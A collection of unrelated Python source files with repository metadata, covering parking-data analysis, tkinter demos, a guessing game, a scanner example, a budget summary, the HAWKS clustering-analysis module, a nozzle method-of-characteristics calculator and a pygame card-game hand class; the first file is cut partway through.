payload, client_address = s.recvfrom(65536)
# data = json.loads(payload.decode())
print("Received payload: " + payload.decode())
print("Handling the message..")
handleClientMessage(payload.decode(), client_address) # Handle the message received accordingly
checkAvailableRide() # check the queues if we can send wagon with passenger
print("")
| true |
0121950dd94d2681322997ca71758a02a6cf866e | Python | wchh-2000/Parking_data_analysis | /get_data.py | UTF-8 | 4,024 | 3.53125 | 4 | [] | no_license | import pandas as pd
def time2dig(t):#输入时间格式'2018-09-18 23:06:51' 输出23.117,单位小时
t=t[11:]#舍去日期
hour=int(t[0:2])#首下标含,尾下标不含
Min=int(t[3:5])
sec=int(t[6:])
if sec>=30:
Min+=1 #超过30秒分钟加1 精确到分钟
return hour+Min/60
import re
def len2dig(t):#输入'0天2小时19分51秒',输出2.33 单位小时
t = re.split('[天 小时 分 秒]',t.strip())#多分隔符
t = [int(i) for i in t if i != '']#去除列表中空值 字符串转化为整数
day,hour,Min,sec=t
if sec>=30:
Min+=1 #超过30秒分钟加1 精确到分钟
return day*24+hour+Min/60
def num2week(n):#输入n为与星期日间隔的天数 输出星期几
r=n%7#余数0-6 余数0则为星期日 1为星期一
dic=['星期日','星期一','星期二','星期三','星期四','星期五','星期六']
return dic[r]
import os
def get_data():
fnames = os.listdir('./data/')#./相对目录 返回data文件夹下所有文件名称
dfall=pd.DataFrame()#创建一个空的dataframe
for fname in fnames:
df=pd.read_excel('./data/'+fname,skiprows=3)#跳过前三行,从第四行开始读取
delid=[0,1,3,4,5,6,7,9,18,19,20]+list(range(11,17))+list(range(22,29))#要删除的列标
df.drop(df.columns[delid], axis=1, inplace=True)#axis=1,删除指定列 inplace修改原来df
df.dropna(inplace=True)#去掉空数据,删除一整行
df.rename(columns={'车牌号码':'num','服务套餐':'type','入场时间':'intime',\
'出场时间':'outtime','停车时长':'length'}, inplace = True)#替换列名称
df['type']=df['type'].replace(['纯车牌月卡A','临时车纯车牌识别(小车)'],['业主','临时'])
df['indatetime']=pd.to_datetime(df['intime'])#开始停车的日期加时刻 转化为datetime64类型
df['outdatetime']=pd.to_datetime(df['outtime'])#离开的日期加时刻 转化为datetime64类型
delid=df.loc[df['indatetime']<pd.to_datetime('2018-09-01'),:].index
df=df.drop(delid)#9.1以前开始停车的日期数据删除 删除一整行 相应的indate也删掉了
#outdatetime 不用删,因为excel表数据本身是根据离开时刻排的
df['indate']=list(map(lambda s:s[0:10],df['intime']))#lambda创建匿名函数,取前十个字符
df['indate']=pd.to_datetime(df['indate'])#转化为datetime64类型,方便处理
df['intimedig']=list(map(time2dig,df['intime']))#数字化的连续时间float64类
df['intime']=list(map(lambda s:s[11:],df['intime']))#取第11个字符及以后,为一天内停车时刻
df['intime']=pd.to_datetime(df['intime'])#转化为datetime64类型
df['outdate']=list(map(lambda s:s[0:10],df['outtime']))
df['outdate']=pd.to_datetime(df['outdate'])
df['outtimedig']=list(map(time2dig,df['outtime']))
df['outtime']=list(map(lambda s:s[11:],df['outtime']))#取第11个字符及以后,为一天内停车时刻
df['outtime']=pd.to_datetime(df['outtime'])#转化为datetime64类型
df['length']=list(map(len2dig,df['length']))
dfall=pd.concat([dfall,df],ignore_index=True)#竖向拼接 重新分配索引
interval=dfall['indate']-pd.to_datetime('2018-09-02')#2018-09-02为星期日
#与星期日的日期间隔 Series类 每个元素Timedelta类
interval=[i.days for i in interval]#.days为Timedelta的属性 天数
#每个元素(日期间隔)转化为整数,构成列表
dfall['inweek']=pd.Series([num2week(i) for i in interval])
#转化为星期 构建Series类型数据 创建为df新的一列week 后来发现不需要转换为Series 列表就可以
#outweek同理
interval=dfall['outdate']-pd.to_datetime('2018-09-02')
interval=[i.days for i in interval]
dfall['outweek']=pd.Series([num2week(i) for i in interval])
#print(dfall.head(10))
return dfall
df=get_data()
| true |
5d908654a6a275b51e44758c9f718912d864b730 | Python | yohira0616/python-til | /hello_tkinter.py | UTF-8 | 158 | 3.171875 | 3 | [] | no_license | import tkinter as tk
root=tk.Tk()
root.title("Hello,tkinter!")
root.geometry("640x480")
label = tk.Label(text="Hello,World")
label.pack()
root.mainloop()
| true |
dce758adce284fd4e2cededad11a78fc18080e36 | Python | DomenOslaj/Hidden-number | /hidden-number.py | UTF-8 | 571 | 3.9375 | 4 | [] | no_license | import random
def main():
secret = random.randint(1, 30)
while True:
guess = raw_input("Which number do i have in mind? :) ")
guess = int(guess)
if guess == secret:
print ("Congratulations, that is the right number!")
break
elif guess > secret:
print ("Nope, try something smaller! :)")
elif guess < secret:
print ("Nope, try something bigger! :)")
if __name__ == "__main__": # this means that if somebody ran this Python file, execute only the code below
main() | true |
33cd184335afff7624c43d28c3d8cae4162856d4 | Python | rokastr/Introduction-to-Object-oriented-Programming | /oblig3/sirkel.py | UTF-8 | 225 | 3.15625 | 3 | [] | no_license | #Et program tegner en rød sirkel.
from ezgraphics import GraphicsWindow
win = GraphicsWindow(400,200)
c = win.canvas()
c.setOutline("red")
c.setFill(255, 0, 100)
c.setColor("red")
c.drawOval(45, 45, 90, 90)
win.wait()
| true |
453776f23efcd7a2f38f5027eebde4682218a248 | Python | Techainer/pyScanLib | /exampleUsage.py | UTF-8 | 1,093 | 2.9375 | 3 | [
"BSD-2-Clause"
] | permissive | from pyScanLib import pyScanLib
#======================================================================
# Name: saneLib
# Location: https://github.com/soachishti/pyScanLib
# License: BSD 2-Clause License
#======================================================================
ls = pyScanLib()
scanners = pyScanLib.getScanners()
print scanners
ls.setScanner(scanners[0])
# Below statement must be run after setScanner()
ls.setDPI(300)
print ls.getScannerSize() # (left,top,width,height)
# Set Area in Pixels
# width = ls.pixelToInch(128)
# height = ls.pixelToInch(128)
# ls.setScanArea(width=width,height=height) # (left,top,width,height)
# Set Area in centimeter
# width = ls.cmToInch(10)
# height = ls.cmToInch(10)
# ls.setScanArea(width=width,height=height) # (left,top,width,height)
# A4 Example
ls.setScanArea(width=8.26,height=11.693) # (left,top,width,height) in Inches
ls.setPixelType("color") # bw/gray/color
pil = ls.scan()
pil.show()
pil.save("scannedImage.jpg")
ls.closeScanner() # unselect selected scanner in setScanners()
ls.close() # Destory whole class | true |
78b019df137857af1f774df7555e95f4b1ae43ab | Python | AnthonyTurgelis/python-challenge | /PyBank/main.py | UTF-8 | 1,614 | 3.140625 | 3 | [] | no_license | import os
import csv
import pandas as pd
import numpy as np
import itertools as it
csvpath = os.path.join('..', 'pybank', 'budget_data.csv')
months = []
profit = []
maxi = []
mini = []
with open(csvpath, newline='') as csvfile:
csvreader = csv.reader(csvfile, delimiter=",")
next(csvfile)
for row in csvreader:
months.append(row[0])
profit.append(int(row[1]))
print("Total Months:", int(len(months)))
totalprofit = sum(profit)
print("Total: $",int(totalprofit))
absolute = np.absolute(profit, out = None)
totalabsolute = sum(absolute)
avgchange = totalabsolute / int(len(months))
print("Average Change: $", avgchange)
max = np.amax(profit)
with open(csvpath, newline='') as csvfile:
csvreader = csv.reader(csvfile, delimiter=",")
next(csvfile)
for row in csvreader:
if float(row[1]) >= (max - 1):
print("Greatest increase in profits:", row[0], "$",row[1])
maxi = [row[0],row[1]]
min = np.amin(profit)
with open(csvpath, newline='') as csvfile:
csvreader = csv.reader(csvfile, delimiter=",")
next(csvfile)
for row in csvreader:
if float(row[1]) <= (min + 1):
print("Greatest decrease in profits:", row[0], "$",row[1])
mini = [row[0],row[1]]
cleaned_csv = zip(it.repeat(len(months)),it.repeat(float(totalprofit)),maxi,mini)
# Set variable for output file
output_file = os.path.join("budget_final.csv")
# Open the output file
with open(output_file, "w", newline="") as datafile:
writer = csv.writer(datafile)
# Write the header row
writer.writerow(["Months","Total","Max Increease","Max Decrease"])
# Write in zipped rows
writer.writerows(cleaned_csv)
| true |
18d63f77cc20d3bad8a2da0bb56b52e86e42e159 | Python | EHB-MCT/web3-prototypes-sarahverbelen | /ai-api-prototype/pythonapi.py | UTF-8 | 476 | 2.671875 | 3 | [] | no_license | import flask
from flask import request
from joblib import dump, load
pipeline = load('model.joblib')
app = flask.Flask(__name__)
app.config["DEBUG"] = True
@app.route('/', methods=['GET'])
def home():
return "<h1>Python AI API</h1><p>Deze api geeft 'pos' of 'neg' terug als antwoord op een nederlandstalige tekst.</p>"
@app.route('/getResult', methods=['POST'])
def getResult():
result = pipeline.predict([request.json['text']])
return result[0]
app.run()
| true |
58c508b8b8a9f6a4935555649c91148fb0f7511c | Python | ricardomachorro/PracticasPropias | /PythonEnsayo/Python6.py | UTF-8 | 791 | 3.859375 | 4 | [] | no_license | #Otro tipo de dato que existe en python y que sirve mucho para bucles
#es el tipo de dato range, ya que esta es una coleccion ordenada de numeros que los puede
#controlar estricturas como el for
#se declara con la palabra reservada range:
#si se le pone solo un parametro este se toma como valor maximo
rang1 = range(6)
for i in rang1:
print(i)
print("//////////////////////")
#si se le ponen dos parametros se toma el primero com valor minimo, y el ultimo como el maximo
rang2 = range(2,5)
for i in rang2:
print(i)
print("//////////////////////")
#si se le ponen tres parametros se toma el primero com valor minimo,el segundo como valor maximo
# y el ultimo como el salto que se da entre numeros
rang3 = range(3,19,3)
for i in rang3:
print(i)
print("///////////////////////")
| true |
afaaac2a984e4346249fa03509774dc3b675508a | Python | sea-shunned/hawks | /hawks/analysis.py | UTF-8 | 16,974 | 2.625 | 3 | [
"MIT"
] | permissive | """Defines the clustering algorithms and handles running them. Primarily used for analysis and instance space generation.
"""
from collections import defaultdict
from pathlib import Path
from itertools import zip_longest
import warnings
import inspect
import numpy as np
import pandas as pd
import sklearn.cluster
import sklearn.mixture
from sklearn.metrics import adjusted_rand_score
from scipy.spatial.distance import pdist, squareform
import hawks.utils
import hawks.problem_features
warnings.filterwarnings(
action='ignore', category=FutureWarning, module="sklearn"
)
def define_cluster_algs(seed):
"""Defines some default clustering algorithms. Currently uses four simple algorithms: average-linkage, GMM, K-Means++, and single-linkage.
Args:
seed (int): Random seed given to the algorithms. ``int`` is generally fine, but depends on the algorithm implementation.
Returns:
dict: A dict where each key is the name of the algorithm, with ``"class"`` as a callable to create (and fit) the model, any ``"kwargs"`` it needs, and ``"k_multiplier"`` if anything other than the true number of clusters is desired.
.. todo::
Extend functionality for arbitrary clustering algorithms
"""
cluster_algs = {
"Average-Linkage": {
"class": getattr(sklearn.cluster, "AgglomerativeClustering"),
"kwargs": {
"linkage": "average",
"n_clusters": None
},
"k_multiplier": None
},
"Average-Linkage (2K)": {
"class": getattr(sklearn.cluster, "AgglomerativeClustering"),
"kwargs": {
"linkage": "average",
"n_clusters": None
},
"k_multiplier": 2.0
},
"GMM": {
"class": getattr(sklearn.mixture, "GaussianMixture"),
"kwargs": {
"n_components": None,
"random_state": seed,
"n_init": 3
},
"k_multiplier": None
},
"K-Means++": {
"class": getattr(sklearn.cluster, "KMeans"),
"kwargs": {
"n_clusters": None,
"random_state": seed,
"n_init": 10
},
"k_multiplier": None
},
"Single-Linkage": {
"class": getattr(sklearn.cluster, "AgglomerativeClustering"),
"kwargs": {
"linkage": "single",
"n_clusters": None
},
"k_multiplier": None
},
"Single-Linkage (2K)": {
"class": getattr(sklearn.cluster, "AgglomerativeClustering"),
"kwargs": {
"linkage": "single",
"n_clusters": None
},
"k_multiplier": 2.0
}
}
return cluster_algs
def extract_datasets(generator=None, datasets=None, label_sets=None):
# Something needs to be given
if generator is None and datasets is None:
raise ValueError(f"No generator or datasets have been given - there's nothing to evaluate!")
# Extract the datasets and labels from the generator
if generator is not None:
# Create local references to datasets and label_sets
datasets, label_sets, configs = generator.get_best_dataset(return_config=True)
# Get a flat list of the config id for each one of the datasets
config_nums = np.arange(
len(configs)
).repeat(
generator.full_config["hawks"]["num_runs"]
).tolist()
# Otherwise just set the config number to be None's
else:
config_nums = [None]*len(datasets)
# Test for unequal number of datasets and label sets
if len(datasets) != len(label_sets):
raise ValueError("The number of datasets is not equal to the number of labels")
return datasets, label_sets, config_nums
def setup_folder(save_folder, generator):
# Prioritize a given save folder
if save_folder is not None:
base_folder = Path(save_folder)
# Or use the generator's folder
elif generator is not None and generator.base_folder is not None:
base_folder = generator.base_folder
# Use current date in cwd as last resort
else:
base_folder = Path.cwd() / f"clustering_{hawks.utils.get_date()}"
return base_folder
def analyse_datasets(generator=None, datasets=None, label_sets=None, cluster_subset=None, feature_subset=None, seed=None, source="HAWKS", prev_df=None, clustering=True, feature_space=True, save=True, save_folder=None, filename="dataset_analysis"):
"""Function to analyze the datasets, either by their :py:mod:`~hawks.problem_features`, clustering algorithm performance, or both.
Args:
generator (:class:`~hawks.generator.BaseGenerator`, optional): HAWKS generator instance (that contains datasets). Defaults to None.
datasets (list, optional): A list of the datasets to be examined. Defaults to None.
label_sets (list, optional): A list of labels that match the list of datasets. Defaults to None.
cluster_subset (list, optional): A list of clustering algorithms to use. Defaults to None, where all default clustering algorithms (specified in :func:`~hawks.analysis.define_cluster_algs`) are used.
feature_subset (list, optional): A list of problem features to use. Defaults to None, where all problem features (specified in :mod:`~hawks.problem_features`) are used.
seed (int, optional): Random seed number. Defaults to None, where it is randomly selected.
source (str, optional): Name of the set of datasets. Useful for organizing/analyzing/plotting results. Defaults to "HAWKS".
prev_df (:py:class:`~pandas.DataFrame`, optional): Pass in a previous DataFrame, with which the results are added to. Defaults to None, creating a blank DataFrame.
clustering (bool, optional): Whether to run clustering algorithms on the datasets or not. Defaults to True.
feature_space (bool, optional): Whether to run the problem features on the datasets or not. Defaults to True.
save (bool, optional): Whether to save the results or not. Defaults to True.
save_folder (str, :class:`pathlib.Path`, optional): Where to save the results. Defaults to None, where the location of the :class:`~hawks.generator.BaseGenerator` is used. If no :class:`~hawks.generator.BaseGenerator` instance was given, create a folder in the working directory.
filename (str, optional): Name of the CSV file to be saved. Defaults to "dataset_analysis".
Returns:
(tuple): 2-element tuple containing:
:py:class:`~pandas.DataFrame`: DataFrame with results for each dataset.
:py:class:`pathlib.Path`: The path to the folder where the results are saved.
"""
if clustering is False and feature_space is False:
raise ValueError("At least one of `clustering` or `feature_space` must be selected, otherwise there is nothing to do")
# Extract the datasets
datasets, label_sets, config_nums = extract_datasets(
generator=generator,
datasets=datasets,
label_sets=label_sets
)
# Setup the save folder
if save or save_folder is not None:
base_folder = setup_folder(save_folder, generator)
# If a path is given for the save folder, assume saving is wanted
save = True
else:
base_folder = None
# Initialize the dataframe
df = pd.DataFrame()
# Provided seed has priority, then seed from generator
if seed is None and generator is not None:
seed = generator.seed_num
# Otherwise random seed, but raise warning due to unreliable reproducibility
elif seed is None and generator is None:
seed = np.random.randint(100)
warnings.warn(
message=f"No seed was provided, using {seed} instead",
category=UserWarning
)
# Setup and run feature space functions
if feature_space:
# Get the functions from problem_features.py (not imported)
feature_funcs = dict(
[func_tup for func_tup in inspect.getmembers(hawks.problem_features, inspect.isfunction) if func_tup[1].__module__ == "hawks.problem_features"]
)
# If a feature subset has been given, remove those functions
if feature_subset is not None:
feature_dict = {}
for feature_name in feature_subset:
try:
feature_dict[feature_name] = feature_funcs[feature_name]
except KeyError as e:
raise Exception(f"{feature_name} cannot be found, must be in: {feature_funcs.keys()}") from e
else:
feature_dict = feature_funcs
feature_df = run_feature_space(datasets, label_sets, config_nums, feature_dict, df, source)
# Setup and run clustering algorithms
if clustering:
# Get the defined clustering algs
cluster_algs = define_cluster_algs(seed)
# If a subset of algorithms is given, then select only those
if cluster_subset is not None:
alg_dict = {}
for alg_name in cluster_subset:
try:
alg_dict[alg_name] = cluster_algs[alg_name]
except KeyError as e:
raise Exception(f"{alg_name} cannot be found, must be in: {cluster_algs.keys()}") from e
else:
alg_dict = cluster_algs
# Run the clustering algorithms
cluster_df = run_clustering(datasets, label_sets, config_nums, alg_dict, df, source)
# Join the dataframes if need be
if feature_space and clustering:
# Need to merge on source and dataset number
# Use concat to handle when config_num may be undefined (rather than pd.merge)
final_df = pd.concat([cluster_df, feature_df], axis=1)
final_df = final_df.loc[:, ~final_df.columns.duplicated()]
elif feature_space:
final_df = feature_df
elif clustering:
final_df = cluster_df
if prev_df is not None:
final_df = prev_df.append(
final_df,
ignore_index=True,
sort=False
)
# Save the full dataframe
if save:
base_folder.mkdir(parents=True, exist_ok=True)
hawks.utils.df_to_csv(
df=final_df,
path=base_folder,
filename=filename
)
return final_df, base_folder
def run_clustering(datasets, label_sets, config_nums, alg_dict, df, source):
"""Function to actually run the clustering algorithms and add results to the DataFrame.
Args:
datasets (list, optional): A list of the datasets to be examined. Defaults to None.
label_sets (list, optional): A list of labels that match the list of datasets. Defaults to None.
config_nums (list): A list of the config numbers (only relevant for HAWKS, not external datasets). Allows linking of datasets to parameter configuration.
alg_dict (dict): Dictionary of the clustering algorithms. Defined in :func:`~hawks.analysis.define_cluster_algs`.
df (:py:class:`~pandas.DataFrame`): DataFrame to add the results to.
source (str): Name of the set of datasets.
Returns:
:py:class:`~pandas.DataFrame`: DataFrame with the clustering results.
"""
# Loop over the datasets
for dataset_num, (data, labels, config_num) in enumerate(zip_longest(datasets, label_sets, config_nums)):
# Create the defaultdict
res_dict = defaultdict(list)
# Add the constants to the dict
res_dict["source"].append(source)
res_dict["config_num"].append(config_num)
res_dict["dataset_num"].append(dataset_num)
# Add some extra general info about the dataset here
res_dict["num_examples"].append(int(data.shape[0]))
res_dict["num_clusters"].append(int(np.unique(labels).shape[0]))
# Loop over the dict of clustering algorithms
for name, d in alg_dict.items():
# Add in the number of clusters
d["kwargs"] = determine_num_clusters(name, d["kwargs"], d["k_multiplier"], labels)
# Increment the seed to avoid pattern in datasets
if "random_state" in d["kwargs"]:
d["kwargs"]["random_state"] += 1
# Pass the kwargs to the relevant algorithm class
alg = d["class"](**d["kwargs"])
# Run the algorithm
alg.fit(data)
# Predict labels and compare if we have the truth
if labels is not None:
# import pdb; pdb.set_trace()
# Obtain labels for this algorithm on this dataset
if hasattr(alg, "labels_"):
labels_pred = alg.labels_.astype(np.int)
else:
labels_pred = alg.predict(data)
ari_score = adjusted_rand_score(labels, labels_pred)
# No labels, so just set scores to NaN
else:
ari_score = np.nan
# Add the cluster name and scores
res_dict[f"c_{name}"].append(ari_score)
# Calculate evaluation metrics and add to df
# Not particularly efficient
df = df.append(
pd.DataFrame.from_dict(res_dict),
ignore_index=True,
sort=False
)
return df
def run_feature_space(datasets, label_sets, config_nums, feature_dict, df, source):
"""Function to actually run the problem features on the datasets and add results to the DataFrame.
Args:
datasets (list, optional): A list of the datasets to be examined. Defaults to None.
label_sets (list, optional): A list of labels that match the list of datasets. Defaults to None.
config_nums (list): A list of the config numbers (only relevant for HAWKS, not external datasets). Allows linking of datasets to parameter configuration.
feature_dict (dict): Dictionary of the problem features to be used.
df (:py:class:`~pandas.DataFrame`): DataFrame to add the results to.
source (str): Name of the set of datasets.
Returns:
:py:class:`~pandas.DataFrame`: DataFrame with the clustering results.
"""
# Loop over the datasets
for dataset_num, (data, labels, config_num) in enumerate(zip_longest(datasets, label_sets, config_nums)):
# Create the defaultdict
res_dict = defaultdict(list)
# Add the constants to the dict
res_dict["source"].append(source)
res_dict["config_num"].append(config_num)
res_dict["dataset_num"].append(dataset_num)
# Add some extra general info about the dataset here
res_dict["num_examples"].append(int(data.shape[0]))
res_dict["num_clusters"].append(int(np.unique(labels).shape[0]))
# Precomputation for problem features (assumes we always use all)
precomp_dict = {
"dists_sqeuclidean": squareform(pdist(data, metric="sqeuclidean"))
}
# precomp_dict["dists_euclidean"] = np.sqrt(precomp_dict["dists_sqeuclidean"])
# Calculate the feature values for this problem/data
for name, func in feature_dict.items():
res_dict[f"f_{name}"].append(func(data, labels, precomp_dict))
# Add to dataframe
# Not particularly efficient
df = df.append(
pd.DataFrame.from_dict(res_dict),
ignore_index=True,
sort=False
)
return df
def determine_num_clusters(col_name, alg_kwargs, multiplier, labels):
"""Function to extract the number of clusters for the dataset (requires labels, this isn't an estimation process).
Args:
col_name (str): Name of the algorithm.
alg_kwargs (dict): Arguments for the clustering algorithm.
multiplier (float): Multiplier for the number of clusters.
labels (list): The labels for this dataset. Can be a list or :py:class:`numpy.ndarray`.
Raises:
KeyError: Incorrect algorithm name given.
Returns:
dict: The algorithm's arguments with the cluster number added.
"""
# Fix annoying inconsistency with sklearn arg names
if col_name == "GMM":
arg = "n_components"
else:
arg = "n_clusters"
# Check that this alg takes arg as input
if arg in alg_kwargs:
# Calc the actual number of clusters
num_clusts = np.unique(labels).shape[0]
# Set multiplier to 1 if there isn't one
if multiplier is None:
multiplier = 1
# Calculate what will be given to the algorithm
given_clusts = int(num_clusts * multiplier)
# Insert the argument
alg_kwargs[arg] = given_clusts
# Ensure that the correct number is being inserted
assert alg_kwargs[arg] == given_clusts
else:
raise KeyError(f"{arg} was not found in {col_name}'s kwargs: {alg_kwargs}")
return alg_kwargs
| true |
04a65818cb6f884008ced0ca49cb021455500bf1 | Python | xandhiller/learningPython | /boxPrint.py | UTF-8 | 757 | 4.03125 | 4 | [] | no_license | #! python3
# Purpose: Following through an example from the book.
# It aims to demonstrate the use of exceptions as a debugging method.
def boxPrint(symbol, width, height):
if len(symbol) != 1:
raise Exception('Symbol myst be a single character string.')
if width <= 2:
raise Exception('Width must be greater than 2.')
if height <= 2:
raise Exception('Height must be greater than 2.')
print (symbol * width)
for i in range(height - 2):
print(symbol + (' ' * (width -2)) + symbol)
print(symbol * width)
for sym, w, h in (('*', 4, 4), ('0', 20, 5), ('x', 1, 3), ('ZZ', 3, 3)):
try:
boxPrint(sym, w, h)
except Exception as err:
print('An exception has occurred: ' + str(err))
| true |
07a4fda00b58f1073a6d254dac9aea8c188532b5 | Python | MNahad/soton-nozzle | /MoC.py | UTF-8 | 6,304 | 3.328125 | 3 | [
"MIT"
] | permissive | #!/usr/bin/env python
"""
1. Lookup table for Argon (gamma=5/3) with:
Mach number M
Mach angle mu in degrees
Prandtl-Meyer function neu in degrees
from 1 <= M <= 3
2. Method of Characteristics table which produces geometry for
minimum length 2D symmetric nozzle using 4 characteristics
Author: Mohammed Nawabuddin
"""
import numpy as np # http://www.numpy.org/
import scipy.optimize as opt # https://scipy.org/
import math
# Set initial gamma, initial theta and desired Mach number
gamma = 5/3
Mdes = 2.7
initialTheta = 0.4
def mu(mach):
"""
Returns mu from Mach
"""
return math.asin(1 / mach) * (180 / math.pi)
def neu(mach):
"""
Returns neu from Mach
"""
return ((((gamma+1)/(gamma-1))**0.5) *
(math.atan2((((gamma-1)/(gamma+1))*((mach**2)-1))**0.5, 1)) -
math.atan2(((mach**2)-1)**0.5, 1)) * \
(180 / math.pi)
def _tanAlpha(prv, nxt):
"""
Called by coord()
"""
return math.tan(((prv + nxt)/2) * (math.pi/180))
def coord(xUpp, yUpp, xLow, yLow, angUpp, angLow, angSum, angDiff, isSym):
"""
Used in calculating nozzle geometry
"""
if isSym == 1:
xp = xUpp - ((yUpp)/(_tanAlpha(angUpp, angDiff)))
return [xp, 0]
if isSym == 0:
xp = (xUpp*_tanAlpha(angUpp, angDiff) - xLow*_tanAlpha(angLow, angSum) +
yLow - yUpp) / \
(_tanAlpha(angUpp, angDiff) - _tanAlpha(angLow, angSum))
yp = yLow + (xp - xLow)*_tanAlpha(angLow, angSum)
return [xp, yp]
def areaRatio(gamma, mach):
"""
Used for finding the area ratio at a set gamma and Mach number
"""
return (((2/(gamma+1))*(1+(((gamma-1)/2)*(mach**2)))) **
((gamma+1)/(2*(gamma-1)))) / \
mach
""" Create lookup table consisting of Mach numbers from 1.00 to
3.00, and their associated mu and neu angles. """
lookup = np.zeros((201, 3))
np.put(lookup, np.arange(0, 601, 3), np.arange(1.00, 3.01, 0.01))
for row in lookup:
row[1] = mu(row[0])
for row in lookup:
row[2] = neu(row[0])
# Save table
np.savetxt("outputs/lookup.csv", lookup, delimiter=',')
""" Create MoC table for fluid at the desired gamma and
at an exit velocity at the desired Mach number """
# Blank MoC table
MoC = np.zeros((18, 11))
# Add point IDs
for row in np.arange(4, 18):
MoC[row, 0] = row - 3
# Add initial info at throat
MoC[3, 3] = neu(Mdes)/2
MoC[0, 3] = initialTheta
MoC[1, 3] = ((MoC[3, 3] - MoC[0, 3]) / 3) + MoC[0, 3]
MoC[2, 3] = 2 * ((MoC[3, 3] - MoC[0, 3]) / 3) + MoC[0, 3]
# Fill in neu and Riemann for throat
for row in np.arange(4):
MoC[row, 4] = MoC[row, 3]
MoC[row, 2] = MoC[row, 3] + MoC[row, 4]
# Fill other points by iterating over characteristic lines
outerWaveIter = 3
for charac in np.array([[17, 2], [15, 3], [12, 4], [8, 5]]):
innerWaveIter = 4
for row in np.arange(charac[0], charac[0]-charac[1], -1):
MoC[row, 1] = MoC[outerWaveIter, 2]
if innerWaveIter < 4:
MoC[row, 2] = MoC[innerWaveIter, 2]
MoC[row, 3] = (MoC[row, 2] - MoC[row, 1]) / 2
MoC[row, 4] = (MoC[row, 2] + MoC[row, 1]) / 2
innerWaveIter -= 1
outerWaveIter -= 1
# Housekeeping
for row in np.array([8, 12, 15, 17]):
MoC[row, 3] = (MoC[row - 1, 2] - MoC[row - 1, 1]) / 2
MoC[row, 4] = (MoC[row - 1, 2] + MoC[row - 1, 1]) / 2
""" Find Mach from neu by searching for the optimum value using
the SciPy implementation of the van Wijngaarden-Deker-Brent
method. Find mu from Mach. Find theta+mu and theta-mu. """
for row in MoC:
row[5] = opt.brentq(lambda x: neu(x) - row[4], 1.00, 3.00)
row[6] = mu(row[5])
row[7] = row[3]+row[6]
row[8] = row[3]-row[6]
# Set initial x and y geometry for the throat to (0,1)
for row in np.arange(4):
MoC[row, 10] = 1
""" For each point in the nozzle, define its two other
significant points and a flag for the type of point. Then find
the x and y coordinates of that point
and insert into table. """
for point in np.array([[100, 4, 0, 0],
[4, 5, 1, 1],
[5, 6, 2, 1],
[6, 7, 3, 1],
[7, 8, 3, 2],
[100, 9, 5, 0],
[9, 10, 6, 1],
[10, 11, 7, 1],
[11, 12, 8, 2],
[100, 13, 10, 0],
[13, 14, 11, 1],
[14, 15, 12, 2],
[100, 16, 14, 0],
[16, 17, 15, 2]]):
if point[3] == 0:
MoC[point[1], 9], MoC[point[1], 10] = \
coord(MoC[point[2], 9], MoC[point[2], 10],
0, 0,
MoC[point[2], 8], 0,
0, MoC[point[1], 8], 1)
if point[3] == 1:
MoC[point[1], 9], MoC[point[1], 10] = \
coord(MoC[point[2], 9], MoC[point[2], 10],
MoC[point[0], 9], MoC[point[0], 10],
MoC[point[2], 8], MoC[point[0], 7],
MoC[point[1], 7], MoC[point[1], 8], 0)
if point[3] == 2:
MoC[point[1], 9], MoC[point[1], 10] = \
coord(MoC[point[2], 9], MoC[point[2], 10],
MoC[point[0], 9], MoC[point[0], 10],
MoC[point[2], 3], MoC[point[0], 7],
MoC[point[0], 7], MoC[point[0], 3], 0)
# Save the MoC table
np.savetxt("outputs/MoC.csv", MoC, delimiter=',')
# Compare nozzle geometry with quasi-1D nozzle theory
AXAStar = np.array([areaRatio(gamma, MoC[row, 5]) for row in [8, 12, 15, 17]])
ratioDiff = np.array([MoC[row, 10] for row in [8, 12, 15, 17]]) - AXAStar
# Print tables
print("LOOKUP")
for row in lookup:
print(row)
print("\n")
print("LEFT HALF OF MOC")
print(MoC[0:4, :5])
print(MoC[4:9, :5])
print(MoC[9:13, :5])
print(MoC[13:16, :5])
print(MoC[16:18, :5])
print("\n")
print("RIGHT HALF OF MOC")
print(MoC[0:4, 5:])
print(MoC[4:9, 5:])
print(MoC[9:13, 5:])
print(MoC[13:16, 5:])
print(MoC[16:18, 5:])
print("\n")
print("A/A* FOR MACH NUMBERS FOUND AT WALL POINTS")
for ratio in AXAStar:
print(ratio)
print("\n")
print("DIFFERENCE BETWEEN MOC AREA RATIO AND QUASI-1D AREA RATIO")
for diff in ratioDiff:
print(diff)
| true |
91734592aacaf904de64ad9c0f540c4510e5efec | Python | remithiebaut/Coinche | /GraphicHand.py | UTF-8 | 8,595 | 3 | 3 | [] | no_license | # -*- coding: utf-8 -*-
"""
Created on Mon Jul 1 08:56:59 2019
@author: rthie
"""
import generical_function as generic
from GraphicCard import GraphicCard
from Hand import Hand
import graphic_constant as gconst
import pygame
import coinche_constant as const
import sys
class GraphicHand(Hand):
def display(self,screen,player):
"""
display the board of cards
"""
inverse=False
hidden=False
if( player == "j2" )or( player == "j4") :
inverse=True
if( player != "j1") :
hidden=True
i=0
for card in self.cards:
card.play(screen=screen,new_position=gconst.area["cards"][player][i],inverse=inverse,hidden=hidden)
i+=1
pygame.display.flip()
def choose_card(self,random=True):
"""
choose and return a card
"""
if not random : #Real player
while True:
event = pygame.event.poll()
if event.type == pygame.QUIT or event.type == pygame.KEYDOWN and event.key == pygame.K_ESCAPE: #escape
pygame.quit()
sys.exit()
for card in self.cards:
mouse=pygame.mouse.get_pos()
if mouse[0]>card.position[0] and mouse[0]<(card.position[0]+card.position[2]) and mouse[1]>card.position[1] and mouse[1]<(card.position[1]+card.position[3]):
if event.type == pygame.MOUSEBUTTONDOWN :
if card.rest:
pygame.display.flip()
return card
else: #BOT
while True :
card_position = generic.decision(liste_choix_possible=const.liste_entier32[:len(self.cards)], random=random, question="Quelle carte ? 1ère, 2ème ? ")
card_position = int(card_position)-1
if card_position<len(self.cards) :
if self.cards[card_position].rest:
return self.cards[card_position]
def play(self,screen,player,random,pli,hand): # could not work // dont play a empty hand with bots
"""
play a graphic card
"""
if screen!=None :
self.display(screen=screen,player=player)
generic.wait_or_pass(1)
screen.fill(gconst.GREEN,gconst.area[player])
hand.display(screen=screen,player=player)
card=hand.choose_card(random=random)
choosen_color=self.play_card(pli=pli,choosen_card=card)
if screen!=None :
card.play(screen,new_position=gconst.area["cards"]["board"][player])
self.display(screen=screen,player=player)
generic.wait_or_pass(1)
return choosen_color
def color(self, chosen_color):
"""
return all the cards of a given color => it is now returning a Hand !!
"""
cards_of_this_color=[]
for card in self.cards:
if card.color==chosen_color:
cards_of_this_color.append(card)
